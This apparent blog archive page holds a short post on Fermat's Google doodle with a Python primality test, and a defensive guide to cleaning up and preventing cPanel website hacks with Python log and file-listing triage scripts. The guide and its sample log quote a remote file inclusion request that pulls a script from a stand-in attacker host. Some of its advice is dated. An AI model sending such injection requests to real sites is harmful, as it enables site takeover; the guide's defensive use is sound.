https://register.bsdcertification.org//register/register-for-an-exam
http://www.freebsd.org/doc/en_US.ISO8859-1/books/handbook/index.html
FreeBSD Guide
https://launchpad.net/win32-image-writer
This tool is used for writing images to USB sticks or SD/CF cards on Windows.
Pierre de Fermat's Last Theorem celebrated in a cheeky Google doodle
- Wednesday, August 17, 2011
- By Sourabh Banerjee
- 0 comments
Today's Google doodle is apparently too small to contain the proof of Fermat's Last Theorem
Joyeux anniversaire, Pierre de Fermat! Today is the French mathematician's 410th birthday.
Fermat is best known as the originator of Fermat's Last Theorem, which consists of a deceptively simple-looking formula famously scrawled in a book's margin, where he claimed the proof was too large to fit. The theorem's fame grew because – despite the efforts of countless mathematicians – four centuries would pass before the publication of a successful proof in 1995 by Sir Andrew Wiles, a Royal Society Research Professor at Oxford.
Fermat's birthday is marked today with a Google doodle, and in a wry reference to the mathematician's original margin note, if you hover your mouse over the doodle the alt text is "I have discovered a truly marvelous proof of this theorem, which this doodle is too small to contain."
According to the theorem, for any integer n greater than two, there are no positive integers a, b, and c that can satisfy the equation:
a^n + b^n = c^n
You may recognise from your school days the simple case when n = 2 as Pythagoras' Theorem.
Perhaps Fermat would have preferred to be remembered for something other than a small comment in the margin of a book? Here are some of the things that you may not know about Pierre de Fermat.
• Pierre de Fermat is not Pierre de Fermat. He studied to be a lawyer at the University of Orleans, and went on to be the councillor at the High Court of Judicature in Toulouse. Here he became entitled to change his name from Pierre Fermat to Pierre de Fermat.
• Fermat has his own number. Fermat numbers have been found to be good at generating sequences of random numbers that are ideal for data encryption on computers, keeping all your banking and personal files safe.
• Fermat also has a little theorem. Fermat's Little Theorem is used in something called Fermat's Primality Test. The test tells us whether a whole number is a probable prime. Whereas a prime number is strictly a number only divisible by one and itself, a probable prime has similar properties but may be easier to generate. These numbers are very important in cryptography and internet security.
• Fermat is one of the founders of probability theory. Through his close relationship with Blaise Pascal, a mathematician and philosopher, he studied how chance behaves in games with dice. An exchange of letters between the two mathematicians developed a general formulation of probability theory – work which still provides the basic principles of how sporting odds are calculated today from horse racing to football.
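Fermat's Little Theorem turned into the primality test mentioned above, worked through in Python. This is an added example, not part of the article: `is_probable_prime` applies the test for a chosen set of bases, `fermat_liars` lists the bases that let a composite slip through, and `passes_for_all_coprime_bases` shows the test's known failure mode, composites such as 561 that pass for every base coprime to them.

```python
# Added example: Fermat's primality test built on Fermat's Little Theorem.
# Little Theorem: if p is prime and gcd(a, p) == 1, then a^(p-1) ≡ 1 (mod p).
# The test applies the contrapositive: if a^(n-1) mod n != 1 for some base a
# coprime to n, then n is certainly composite. If no tested base proves that,
# n is only a "probable prime": some composites pass for many (or all) bases.
from math import gcd
import random


def fermat_witness(n: int, a: int) -> bool:
    """True when base a proves n composite, i.e. a^(n-1) mod n != 1."""
    return pow(a, n - 1, n) != 1


def is_probable_prime(n: int, bases=None, rounds: int = 8) -> bool:
    """Fermat primality test for n using the given bases (or `rounds` random ones).

    False means n is definitely composite (a witness or a shared factor was found).
    True means every base tested satisfied Fermat's congruence: probably prime.
    """
    if n < 2:
        return False
    if n in (2, 3):
        return True
    if n % 2 == 0:
        return False
    if bases is None:
        bases = [random.randrange(2, n - 1) for _ in range(rounds)]
    for a in bases:
        if gcd(a, n) != 1:
            return False  # a common factor is direct proof that n is composite
        if fermat_witness(n, a):
            return False
    return True


def fermat_liars(n: int) -> list:
    """Bases a in [2, n-2], coprime to n, for which composite n passes the test."""
    return [a for a in range(2, n - 1) if gcd(a, n) == 1 and not fermat_witness(n, a)]


def passes_for_all_coprime_bases(n: int) -> bool:
    """True when every base coprime to n is a liar: the Carmichael-number case.

    561 = 3 * 11 * 17 is the smallest such number; the Fermat test cannot tell it
    from a prime unless a base sharing a factor with it happens to be chosen.
    """
    return all(not fermat_witness(n, a) for a in range(2, n - 1) if gcd(a, n) == 1)


if __name__ == "__main__":
    print("97 probable prime:", is_probable_prime(97, bases=[2, 3, 5]))
    print("91 with base 2:", is_probable_prime(91, bases=[2]))   # witness found
    print("91 with base 3:", is_probable_prime(91, bases=[3]))   # 3 is a liar for 91
    print("liars for 91:", fermat_liars(91))
    print("561 fools every coprime base:", passes_for_all_coprime_bases(561))
```

This is why real-world key generation follows a Fermat-style check with a stronger test such as Miller-Rabin, which has no analogue of the Carmichael numbers.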
It is a measure of Fermat's influence that many of his results are used today in computing and cryptography. However, he is well known for not giving rigorous mathematical proofs with his work. For example, the proof of Fermat's Little Theorem was first given not by Fermat but by Gottfried Leibniz.
This reticence has intrigued and frustrated mathematicians for centuries. On the plus side, there's still some of Fermat's work yet to be proven. So, given the inclination, you can try your hand at solving them.
Pierre de Fermat
Born: August 17, 1601, Beaumont-de-Lomagne, France
Died: January 12, 1665 (aged 63), Castres, France
Residence: France
Nationality: French
Fields: Mathematics and Law
Known for: Number theory, Analytic geometry, Fermat's principle, Probability, Fermat's Last Theorem
Influences: François Viète
Life and work
Fermat was born in Beaumont-de-Lomagne, Tarn-et-Garonne, France; the late 15th century mansion where Fermat was born is now a museum. He was of Basque origin. Fermat's father was a wealthy leather merchant and second consul of Beaumont-de-Lomagne. Pierre had a brother and two sisters and was almost certainly brought up in the town of his birth. There is little evidence concerning his school education, but it may have been at the local Franciscan monastery.
He attended the University of Toulouse before moving to Bordeaux in the second half of the 1620s. In Bordeaux he began his first serious mathematical researches and in 1629 he gave a copy of his restoration of Apollonius's De Locis Planis to one of the mathematicians there. Certainly in Bordeaux he was in contact with Beaugrand and during this time he produced important work on maxima and minima which he gave to Étienne d'Espagnet who clearly shared mathematical interests with Fermat. There he became much influenced by the work of François Viète.
From Bordeaux, Fermat went to Orléans where he studied law at the University. He received a degree in civil law before, in 1631, receiving the title of councillor at the High Court of Judicature in Toulouse, which he held for the rest of his life. Due to the office he now held he became entitled to change his name from Pierre Fermat to Pierre de Fermat. Fluent in Latin, Basque, classical Greek, Italian, and Spanish, Fermat was praised for his written verse in several languages, and his advice was eagerly sought regarding the emendation of Greek texts.
He communicated most of his work in letters to friends, often with little or no proof of his theorems. This allowed him to preserve his status as an "amateur" while gaining the recognition he desired. This naturally led to priority disputes with fellow contemporaries such as Descartes and Wallis. He developed a close relationship with Blaise Pascal.
Anders Hald writes that, "The basis of Fermat's mathematics was the classical Greek treatises combined with Vieta's new algebraic methods."
Holographic image of the will Pierre de Fermat wrote on 4 March 1660, Departmental Archives, Haute-Garonne, Toulouse.
Prevent Site from Getting Hacked: Complete Guide
- Sunday, August 14, 2011
- By Sourabh Banerjee
- 0 comments
Have you ever thought about how you can prevent your website from getting hacked? As you know, there are many threats on the internet, and many attackers are trying to take your site down, so here are some precautions that can help you prevent your site from being hacked. These guidelines can also be used after your site has been hacked. I suggest you build a safety shield before the war begins.
The server configuration discussed here is Linux/Apache with cPanel. The general steps will be the same on any server, but the specifics will differ.
There’s a good chance you came to this page because your website was hacked and you want to know how to clean it up.
Step-by-step repair after a website hack
This will probably take several days. Don’t think it’s going to be easy.
1) Log into cPanel
If the line at the top that says, “Last login from: IP address” is not your IP address from the last time you logged in, write it down. It is probably the hacker.
2) Change passwords for cPanel and for publishing
Use strong passwords. A password MUST NOT BE a single word that is in any human language dictionary, and it SHOULD NOT CONTAIN any real word. It should be random characters.
a) If you publish with FrontPage, change your FrontPage password first:
1. Open your local copy of your site in FrontPage
2. Click the Remote Web Site tab and log in
3. Click Open your Remote Web site in FrontPage (this will open a new copy of FrontPage with your remote site in it)
4. Click Tools > Server > Change Password. Whenever you get a password prompt during this procedure, it wants the old one. It doesn’t want the new one until it asks for it.
After changing the FrontPage password…
b) Log in to your webhosting account and change the password there
Some webhosts might use cPanel for this. Others might have a separate login for password changes. Consider changing the passwords for your email accounts, too.
3) If it is a dire emergency, take your website offline
If the hacker inserted extremely offensive pages or installed a virus, protect your visitors and your reputation by taking your site offline.
While it’s closed, you likely won’t be able to access your site through FrontPage. That’s why you changed your FrontPage password before taking the site offline.
4) Enable log archiving in cPanel
1. Go to cPanel > Raw Log Manager.
2. Check the “Archive Logs…” box.
3. Uncheck the “Remove the previous month’s archived logs…” box.
4. Click Save
If log archiving was off at the time of the hack, it may be too late to see the original hack. However, if the hackers come back, their activity might now be logged, allowing you to identify their IP address.
5) Find and remove all files installed by the hack
This describes an ideal cleanup operation. Will you be able to fully complete every step? Probably not.
If your site isn’t huge, you might save a lot of trouble by deleting everything inside your public_html folder and republishing your entire site from a backup copy. You’ll still need to inspect your root directory (above public_html) and its other subdirectories for damage.
5a) Get a complete list of all the files in your website
There are three methods (Sections 5a, 5b, 5c). For most purposes, this first cron job method will be easier to review in detail than the other two methods.
You probably don’t have direct access to Linux on your server to create a directory listing, but you can create a cron job that will do it. It is the equivalent of the DOS command dir /s.
1. Go to cPanel > Cron jobs > Standard.
2. Enter the email address where you want the output sent,
3. Enter the command line to run. The switches are case-sensitive, so use exactly this capitalization:
ls -1aFlqR
Here it is in upper case to make the letters distinct, but this command is NOT the same as the one above. Don’t use it: LS -1AFLQR.
The switches for the ls command are described at http://www.ss64.com/bash/ls.html and http://en.wikipedia.org/wiki/Ls.
4. Make selections in all the other fields to specify a time several minutes in the future.
5. Click “Save Crontab”.
6. After it runs, go back to Cron Jobs > Standard and delete this job.
The email will contain a listing with lines that look like the following examples for one directory and one file:
drwxr-x--- 33 user user 4096 Feb 5 20:51 public_html/
-rw-r--r-- 1 user user 16669 Feb 5 20:51 index.htm
A brief explanation:
d indicates a directory
The 3 groups of 3 (rwxrwxrwx) are permissions for User, Group, World.
r, w, x stand for Read, Write, Execute a program or Enter a directory.
Walkthrough of the above:
public_html above is a directory.
The User (owner, me) can read, write, or Enter that folder.
The Group (that I am member of) cannot Write to that folder (thus the “-” where the w would be)
The World (everyone else) has no permissions here (“---”). (I know that seems odd for public_html, but the reasons why are not useful here.)
index.htm, the home page:
User can Read or Write.
To everyone else (Group and World), the file is Read-only.
The user fields should show only your hosting account userID or some other ones that are obvious system names.
The numbers are file sizes.
The timestamps are the last-modified times.
There is further explanation in this post at Lunarforums.
How to use the listing:
7. If you have a file list like this that you made before the hack, compare the two lists to identify files in the new listing that don’t belong.
8. If you don’t have a prior list to compare against, review the new list for files that seem out of place. See What To Look For, below.
5b) Examine your site’s files in cPanel > File Manager
If you can’t use the cron job method, this is an alternative, but navigating up and down the directory tree will get very tedious very fast.
In File Manager, file and folder permissions are shown numerically. R=4, W=2, X=1. The permission level for a user is the sum, so the maximum a user can have is 7. If, for example, the User has RW, but Group and World only have R, then the permissions will be: 644.
5c) Examine your site’s files using FTP
With an FTP view of your website, the folders and files look like what you are used to in Windows Explorer. FTP view is available using Internet Explorer 6 or 7 and Windows Explorer. FTP view is easy to navigate, but it doesn’t show file and folder permissions.
a) FTP by IE6
In the IE6 address bar, type the FTP address for your site. It is probably something like: ftp://yourdomain.com/ or ftp://ftp.yourdomain.com/ If you don’t get a login prompt, click File > Login As…
b) FTP by IE7
Help for this is available in IE7 Help (F1) > Contents > FTP.
1. Open Tools > Internet Options > Advanced
2. Make sure “Enable FTP folder view (outside IE)” is checked.
3. Click OK.
4. In the IE7 address bar, type the FTP address for your site.
5. Ignore the error page.
6. Click Page > Open FTP site in Windows Explorer…
7. At the FTP Folder Error dialog box, click OK.
8. Click File > Login As… to obtain the login prompt.
c) FTP by Windows Explorer
1. Enable the address bar (View > Toolbars > Address bar). You may need to unlock the toolbars, relocate, and resize it.
2. In the address bar, type the FTP address for your site.
3. At the FTP Folder Error dialog box, click OK.
4. Click File > Login As… to obtain the login prompt.
5d) What to look for
Regardless of the method you used to get your file list, look for and repair the following. If hacked pages contain clues such as URLs that will help identify the hacker, copy and save the useful text somewhere before you repair the page:
* Files you know don’t belong there. Some hacks install files with ridiculously obvious names like hacked.html or vulnerable.php, etc. Other files might have nonsensical names or names consisting of random character strings. Some files might be in locations that make them suspicious, like a .php file in your /images folder.
Be watchful for any files you don’t recognize, but be careful because some of them are probably required for your site to function properly and you just never noticed them before. You cannot just delete all the files you didn’t put on the site. Determine whether each one is malicious or not. When in doubt, try a web search on the filename or post a question in a forum where other people can tell you if that file is normal.
* Check your root directory (“/”) and its subdirectories for malicious or altered files. Inspect everything carefully. Even if you delete the contents of your public_html and republish the site from scratch, this doesn’t overwrite your folders above public_html, so you must check those manually.
* Find and remove malicious scripts. Look especially for PHP and CGI scripts that you didn’t create. Inspect existing PHP and other plain text scripts for signs of tampering. Backdoor scripts left in place can allow the hackers back in even after you’ve changed your password.
When in doubt, it is safest to stop using scripts you suspect might have been weak, especially ones you wrote yourself, until you can examine them and determine that they’re safe. Rename or delete them so the hacker can’t continue to access them by their previous names.
* Pages with modified dates more recent than you last saved the page yourself. Inspect the text and replace the file with a backup copy, if necessary.
* If you publish with FrontPage HTTP, it appears that whenever you publish any files, the timestamp of every .htm file on the site is set to the time of the publish. So in this case your timestamps may all be identical, except for hacked pages.
6) Check all file and folder permissions
Using the complete file list you made, or File Manager, make sure all file and folder permissions are what they should be. When in doubt, you can compare the permissions of similar or neighboring files and folders. A hacker is unlikely to bother with changing all permissions. Review the brief “RWX” explanation above and apply common sense. Your site visitors are “World”, so World needs Read access to files they are supposed to see. World should almost never have Write access to anything. Although different hosts might have different rules, common permissions for world-accessible folders are 755, and common permissions for world-accessible files are 644. It is left to you to figure out why. If you start running across what look like permissions hacks, you will need to do some studying and some detailed investigation of each file and folder.
A hacker can modify file or folder permissions to allow them to get back in even after you clean up everything else in your site. If they can get Write permission to one folder, they can upload exploit scripts to it and run them.
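Here is an added Python example (not the guide's own code) that automates steps 5a, 5d and 6 together: it parses the `ls -1aFlqR` listing from the cron e-mail, converts each rwx string to the numeric form File Manager shows, diffs the result against a listing made before the hack, and flags world-writable entries, scripts sitting in media folders, and files owned by an unexpected account. The two listings, the account name `user` and the media folder names are constructed assumptions.

```python
# Added example (not the guide's code): triage an `ls -1aFlqR` listing.
# Sample listings below are constructed; `user` is the assumed hosting account.
import re

DIR_HEADER = re.compile(r"^(\S.*):$")          # "./public_html:" lines from -R
ENTRY = re.compile(
    r"^([-dl])([rwxsStT-]{9})\s+\d+\s+(\S+)\s+(\S+)\s+(\d+)\s+"
    r"(\w{3}\s+\d{1,2}\s+(?:\d{2}:\d{2}|\d{4}))\s+(.+)$"
)
SCRIPT_EXT = (".php", ".cgi", ".pl", ".py", ".sh")
MEDIA_DIRS = {"images", "img", "uploads", "media"}   # assumption: no scripts belong here

PRE_HACK_LISTING = """\
./public_html:
drwxr-x--- 33 user user  4096 Feb  5 20:51 ./
-rw-r--r--  1 user user 16669 Feb  5 20:51 index.htm
drwxr-xr-x  2 user user  4096 Feb  5 20:51 images/
drwxr-xr-x  2 user user  4096 Feb  5 20:51 cgi-bin/

./public_html/images:
drwxr-xr-x  2 user user  4096 Feb  5 20:51 ./
-rw-r--r--  1 user user 40210 Jan 12 10:00 logo.png
"""

POST_HACK_LISTING = """\
./public_html:
drwxr-x--- 33 user user  4096 Feb  5 20:51 ./
drwx--x--x 10 user user  4096 Feb  5 20:51 ../
-rw-r--r--  1 user user 16669 Feb  5 20:51 index.htm
drwxrwxrwx  2 user user  4096 Feb  9 03:12 images/
drwxr-xr-x  2 user user  4096 Feb  5 20:51 cgi-bin/

./public_html/images:
drwxrwxrwx  2 user user  4096 Feb  9 03:12 ./
drwxr-x--- 33 user user  4096 Feb  5 20:51 ../
-rw-r--r--  1 user user   812 Feb  9 03:13 x7dkq2.php
-rw-r--r--  1 user user 40210 Jan 12 10:00 logo.png
-rwxr-xr-x  1 nobody nobody 2048 Feb  9 03:14 up.cgi*
"""


def mode_to_octal(perms: str) -> str:
    """'rwxr-x---' -> '750': R=4, W=2, X=1 summed for User, Group, World."""
    digits = []
    for i in (0, 3, 6):
        r, w, x = perms[i:i + 3]
        digits.append(str((4 if r == "r" else 0) + (2 if w == "w" else 0)
                          + (1 if x in "xst" else 0)))
    return "".join(digits)


def parse_listing(text: str) -> list:
    """Turn the e-mailed listing into dicts with full paths and numeric modes."""
    entries, cwd = [], ""
    for line in text.splitlines():
        m = ENTRY.match(line)
        if m is None:
            h = DIR_HEADER.match(line)
            if h:
                cwd = re.sub(r"^\./", "", h.group(1))
            continue                      # also skips "total N" and blank lines
        kind, perms, owner, group, size, mtime, name = m.groups()
        name = name.rstrip("/*@=|")       # -F appends a type indicator
        if name in (".", ".."):
            continue
        entries.append({"path": f"{cwd}/{name}" if cwd else name, "type": kind,
                        "perms": perms, "octal": mode_to_octal(perms), "owner": owner,
                        "group": group, "size": int(size), "mtime": mtime})
    return entries


def new_paths(before: str, after: str) -> list:
    """Step 7 of the guide: paths present now that were not in the earlier listing."""
    old = {e["path"] for e in parse_listing(before)}
    return sorted(e["path"] for e in parse_listing(after) if e["path"] not in old)


def suspicious(entries: list, expected_owners=("user",)) -> list:
    """(path, reason) pairs for the things steps 5d and 6 say to look for."""
    findings = []
    for e in entries:
        parents = e["path"].split("/")[:-1]
        if e["perms"][7] == "w":
            findings.append((e["path"], f"world-writable ({e['octal']})"))
        if e["type"] == "-" and e["path"].lower().endswith(SCRIPT_EXT) \
                and MEDIA_DIRS.intersection(parents):
            findings.append((e["path"], "script inside a media folder"))
        if e["owner"] not in expected_owners:
            findings.append((e["path"], f"unexpected owner {e['owner']}"))
    return findings


if __name__ == "__main__":
    for path in new_paths(PRE_HACK_LISTING, POST_HACK_LISTING):
        print("NEW   ", path)
    for path, reason in suspicious(parse_listing(POST_HACK_LISTING)):
        print("CHECK ", path, "-", reason)
```

Save the e-mailed listing to a text file after each clean publish and feed that file in as `before`, so the diff does the tedious comparison of step 7 for you.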
7) Change your passwords again
In case someone was “watching” inside your site while you did it the first time, do it again now that you know the site is clean.
8) Try to identify the hacker’s IP address
Stats programs like Analog, Webalizer, or AWStats are not going to be helpful here because they generate aggregated statistics. You need detail.
cPanel > Web/FTP Stats > Latest Visitors is useful and easy. It is a good place to go when you first notice the hack, but it is only a start. You really need the full raw logs.
a) If you have never used your site’s raw access logs before:
Your website’s raw access logs are stored and sent to you as gzipped files. If you don’t have a program that will extract *.gz files, get 7-Zip from http://www.7-zip.org/. Its command-line version (7za.exe) is run from a “DOS box” (aka “Command Prompt”).
b) Get your logs from cPanel > Raw Log Manager
1. Go to cPanel > Raw Log Manager
2. Click the name of the file you want to download.
3. At the Open or Save prompt, click Save. Use a descriptive filename. Save the file to a folder that will be easy to navigate to in a Command Prompt. C:\TEMP works well.
4. Open a Command Prompt:
Start > All Programs > Accessories > Command Prompt, or
Start > Run > cmd.exe
5. Go to the folder where you saved the .gz file: cd \temp
6. Type the command line to extract the .gz file:
7za.exe x filename.gz
7. You should get a report that says “Everything is Ok”.
8. I usually delete the .gz file and rename the output file to .log.
9. WordPad is best for viewing these log files as text. Set the font to a monospaced font, with word wrap Off.
10. You can import your HTTP (regular) log file into the Webstats.mdb Access database. It won’t import your FTP log.
11. The HTTP log will also import into Excel, but you will need to tweak the text import wizard settings to get the fields into their columns properly.
12. The FTP log is probably best viewed as text.
Go through the logs carefully. If log archiving was on at the time of the hack, look for suspicious activity in the days prior to the hack. Keep watching the logs in case the hackers come back.
Your regular log will show HTTP accesses, your normal site visitors. Mixed in with all the visitors and legitimate robots, you could find a person or robot GETting pages in an abnormal browse sequence (not following links on your site) or trying to GET pages that don’t exist on your site. They might be seeing if your site has particular pages that are part of widely used scripts that are known to have vulnerabilities. Look for HTTP POST activity. Not all POSTs are suspicious, though. If you use PHP, look for requests that attempt to inject code or variables into the page:
GET /index.php?inc=http://badsite.com/hackscript.txt.
Your FTP log will show FTP accesses, one way that hackers can download your pages, modify them, and upload them back to your website. The only IP addresses in the FTP log should be yours and other authorized FTP users.
In both logs, check the field called REMOTE_USER, User, or UserID. In the HTTP log, this field is blank (“-”) most of the time. Where it does have a value, make sure it’s your UserID and that the IP address is yours. Make sure the timestamps on the accesses match the times you were logged in.
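As an added example (not from the guide), here is Python that runs the checks in this section over a raw HTTP access log: it parses the combined-format lines, flags query parameters that point at an external URL (the `inc=http://...` injection attempt shown above), counts 404s per client to spot probing for scripts that are not on your site, lists POSTs, and reports any request with a REMOTE_USER that is not your own user ID coming from your own IP address. The log lines, the user ID `myuser` and the IP addresses are constructed.

```python
# Added example (not the guide's code): triage a raw Apache access log.
# The log lines, the user ID "myuser" and the addresses below are constructed.
import re
from collections import Counter
from urllib.parse import parse_qsl, urlsplit

LOG_LINE = re.compile(
    r'^(?P<ip>\S+) \S+ (?P<user>\S+) \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\S+)'
)

SAMPLE_LOG = """\
203.0.113.7 - - [09/Feb/2011:03:10:01 -0500] "GET /forminfo.php HTTP/1.1" 404 212 "-" "Mozilla/4.0"
203.0.113.7 - - [09/Feb/2011:03:10:02 -0500] "GET /admin/config.php HTTP/1.1" 404 212 "-" "Mozilla/4.0"
203.0.113.7 - - [09/Feb/2011:03:10:03 -0500] "GET /gallery/init.php HTTP/1.1" 404 212 "-" "Mozilla/4.0"
203.0.113.7 - - [09/Feb/2011:03:10:04 -0500] "GET /index.php?inc=http://badsite.com/hackscript.txt HTTP/1.1" 200 5120 "-" "Mozilla/4.0"
203.0.113.7 - - [09/Feb/2011:03:10:09 -0500] "POST /images/x7dkq2.php HTTP/1.1" 200 44 "-" "Mozilla/4.0"
198.51.100.23 - - [09/Feb/2011:08:15:30 -0500] "GET / HTTP/1.1" 200 16669 "-" "Mozilla/5.0"
198.51.100.23 - - [09/Feb/2011:08:15:31 -0500] "GET /images/logo.png HTTP/1.1" 200 40210 "http://example.test/" "Mozilla/5.0"
192.0.2.10 - admin [09/Feb/2011:09:00:00 -0500] "GET /private/ HTTP/1.1" 200 900 "-" "Mozilla/5.0"
"""


def parse_log(text: str) -> list:
    """Parse combined-format lines; lines that do not match are skipped."""
    records = []
    for line in text.splitlines():
        m = LOG_LINE.match(line)
        if m:
            rec = m.groupdict()
            rec["status"] = int(rec["status"])
            rec["size"] = 0 if rec["size"] == "-" else int(rec["size"])
            records.append(rec)
    return records


def remote_include_attempts(records: list) -> list:
    """Requests where a query parameter carries an external URL, e.g. inc=http://...

    Only the query string is inspected, so a legitimate Referer field that
    contains http:// does not trigger this check.
    """
    hits = []
    for r in records:
        query = urlsplit(r["target"]).query
        for _key, value in parse_qsl(query, keep_blank_values=True):
            if value.lower().startswith(("http://", "https://", "ftp://")):
                hits.append((r["ip"], r["target"]))
                break
    return hits


def scanning_ips(records: list, min_404: int = 3) -> dict:
    """Clients that asked for at least min_404 pages that do not exist on the site."""
    counts = Counter(r["ip"] for r in records if r["status"] == 404)
    return {ip: n for ip, n in counts.items() if n >= min_404}


def post_requests(records: list) -> list:
    """Every POST with its status: not all are bad, but each deserves a look."""
    return [(r["ip"], r["target"], r["status"]) for r in records if r["method"] == "POST"]


def foreign_logins(records: list, my_user: str, my_ips: set) -> list:
    """Authenticated requests (REMOTE_USER set) that are not you from your own IP."""
    return [(r["ip"], r["user"], r["target"]) for r in records
            if r["user"] != "-" and (r["user"] != my_user or r["ip"] not in my_ips)]


def triage(text: str, my_user: str, my_ips: set) -> dict:
    """Run all four checks over one log file and return the findings by category."""
    records = parse_log(text)
    return {
        "remote_include": remote_include_attempts(records),
        "scanners": scanning_ips(records),
        "posts": post_requests(records),
        "foreign_logins": foreign_logins(records, my_user, my_ips),
    }


if __name__ == "__main__":
    for section, findings in triage(SAMPLE_LOG, "myuser", {"198.51.100.23"}).items():
        print(section, findings)
```

Point it at the .log file you extracted in step b) instead of `SAMPLE_LOG`; the FTP log has a different format and is still best read by hand.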
c) Use .htaccess or cPanel > Deny IP to block the hacker’s HTTP access to your site
If you identified the hacker’s IP address, one site where you can look it up to get more information about it is http://whois.domaintools.com/.
You can ban the hacker’s IP address from your site using your public_html/.htaccess file. Apache documentation for this is at: http://httpd.apache.org/docs/1.3/mod/mod_access.html.
Review the instructions in a prior article for how to open .htaccess for editing. As described there, insert the following line in a part of the file that is not enclosed in HTML-like tags.
deny from nnn.nnn.nnn.nnn
The nnn’s are the IP address to block.
If the hacker returns with a different IP that is in the same IP range (i.e. using the same ISP), you can block the whole range for a while, although that carries the risk of banning legitimate visitors, too.
The Apache documentation has instructions for banning a range. Some IP ranges are easily specified using a simple wildcard notation. Other ranges can only be successfully defined using “CIDR/netmask” notation. Although it looks intimidating, it’s easy after the first time you do it. I have a separate article describing how to calculate and use the CIDR/netmask.
d) If the hacker has obtained access to your cPanel or FTP, banning their IP address in .htaccess will NOT keep them out of cPanel and FTP.
If they have scripts that they call by HTTP, it will prevent them from doing that, but only until they log into cPanel and un-ban themselves in .htaccess.
9) Investigate what made the hack possible
It might be obvious or it might require detective work. The section below on hack prevention describes some common avenues of attack. It is important to identify how they got in so you can prevent the next attack. For example, if they got in through a vulnerable script, and you don’t rewrite or update the script, all the work you’ve done to this point is useless because they can come right back and wreck your site again.
Three common avenues:
1. Old versions of third party scripts with known vulnerabilities. Make sure you are using the latest versions of software for forums, image galleries, blogs, and everything else.
If you do all your installations through Fantastico, you can check your versions at cPanel > Fantastico > Installations overview.
Otherwise, the version is usually shown on the pages generated by the script, so go to your gallery, blog, or forum, and look around. Then compare the version to the latest one being distributed at the website for that software.
2. The site password was easy to crack.
3. Homebrew PHP or CGI scripts were flawed and had security holes. Make sure the settings in your php.ini file are as secure as possible.
10) Report or go after the hacker legally?
You can try, but your chances of getting anywhere with it might not be great.
Hacking is a violation of the terms of service for any legitimate web host or ISP. If you can prove that someone is using a particular IP address for hacking, you could report the incident to the web host or ISP in hopes that they might shut the perpetrator down. The contact email is often abuse@ followed by the company’s domain.
What to do BEFORE your website is hacked, so it doesn’t get hacked
What is a hack?
A hack occurs when someone gets write access to your server so they are able to modify, add, or delete pages.
Many people ask, “How could my site have been hacked? The hacked page was 100% pure HTML.”
The answer is that the modification of the page wasn’t the hack. The hack was when they got write access to the server. Modifying the page was simply the thing they chose to do after they got in. Once they get in, they can do ANYTHING with your site that you can do, including alter static pages.
Why do they do it?
Business/money
The goal of most site hacks is to use vulnerable sites to make money. It is a business enterprise. They can:
* Use your site’s mail server to send spam.
* Insert links to their own sites, visible or invisible. The links from your site to theirs bring traffic and also boost their site’s rankings in search engines.
* Insert their AdSense code onto your site’s pages so clicks are credited to them.
* Put phishing pages on your site to try to obtain confidential information from your visitors.
* Use your server to host illegal content.
* Add viruses, adware, or spyware to your site so it’s downloaded onto your visitors’ computers to try to obtain their confidential information.
Fun, challenge, prestige, or malice
There are hackers who deface sites individually, but it’s time-intensive to hack sites one by one. Occasionally a site is hacked by someone who dislikes the site or its owner. These are not the major threats.
How do they do it?
Some examples:
* Automated web crawlers cast a wide net, identifying websites with a specific security weakness. For example, if a popular script is found to have a vulnerable page called forminfo.php, the crawler will visit every website it knows about, issuing a request to GET forminfo.php. If the request returns a code 404 (Page Not Found), then it moves on. If the page returns a code 200 (Success), the website becomes a target, either by a human hacker or by a computer program that executes the steps to exploit the weakness and install the hacker’s files onto the site.
* Crawl the web searching the source code of web pages for PHP or CGI scripts with names commonly used by email forms handlers. When one is found, an automated procedure starts sending it input to test whether the script can be tricked into sending spam to third parties.
* Automated password cracking programs hammer at cPanel logins until the correct user ID and password combinations are found. People who create their own passwords are remarkably predictable, and the algorithms used for password cracking are remarkably sophisticated.
Steps to prevent hacking
1) Always use strong passwords
If you don’t know what a strong password looks like, go to https://www.grc.com/passwords.htm. The third row on that page (“63 random alpha-numeric characters”) contains the types of characters to use for cPanel passwords. Pick the first, or any, 8 chars from that row. Any password that does not look like the ones you see on that page is bad.
* In cPanel, only 8 characters are significant, so use all 8. Use a mixture of upper and lower case letters and digits. Special characters (punctuation, etc.) do not seem to be allowed by cPanel.
The #1 threat to your website is internet attackers. There are thousands of them, and they will definitely try to damage your website if they get in. That is why you MUST use strong passwords that are difficult to crack. This must be the FIRST consideration.
Write down your strong password so you don’t forget it. People sometimes avoid strong passwords because they’ve heard passwords should never be written down. That rule was for Defense Department workers who had to worry about Soviet spies. You don’t. You have to worry about internet hackers. Writing down your strong password is only a trivial security risk. Using a weak password because that’s the only kind you can remember is a huge security risk.
Keep your written passwords appropriately safe for your situation. Do you have mischievous children? Don’t leave passwords lying around where they can find them. Malevolent coworkers? Don’t leave passwords in your desk drawers. Do you habitually lose your wallet or purse? Well then, don’t keep them there, either. Take whatever precautions are necessary for YOUR situation.
If you have a userID associated with your hosting account, keep that as secret as possible, too, because a hacker needs it to log in as you. Don
‘t post it in forum messages.
About strong passwords: http://en.wikipedia.org/wiki/Strong_password#strong_passwords
2) Don’t weaken your server’s file and folder permissions
* Do not modify the file and folder permissions on your server until you know what you’re doing. Study the permission settings carefully. Don’t guess.
Each folder and file on your Linux server has a set of permissions that determine who can read or write that file, execute that program, or enter that folder.
One mistake in a file or folder permission can allow a hacker to get into your site, and they won’t even need your password to do it.
3) Keep third party scripts up to date
If you use popular third party scripts like Coppermine, WordPress, SMF, vBulletin, phpBB, or any others, get on a mailing list or visit forums where updates are announced. When a security update is released, install it without delay.
When a vulnerability is found in a commonly used script, it is likely to be exploited soon by a lot of hackers because it gives them access to a large number of sites.
4) Write your own scripts securely
* Be aware of the potential security risks of each language you use.
* For PHP, use a php.ini file to block some common avenues of attack.
* Don’t use potentially insecure features of any language until you’ve studied and understand them. There are lots of online resources for learning how to code securely.
A vulnerable script can give hackers access to your user database and financial or other confidential or data.
* All data that comes into your script from the outside world poses a potential security risk. If your script takes input from a user or from passed parameters in a URL string or from a cookie, the input needs to be checked for validity, tested to determine if it contains injection exploit code, and cleaned (“escaped”) before you use it to include a file or access a database.
5) Block suspicious accesses with .htaccess
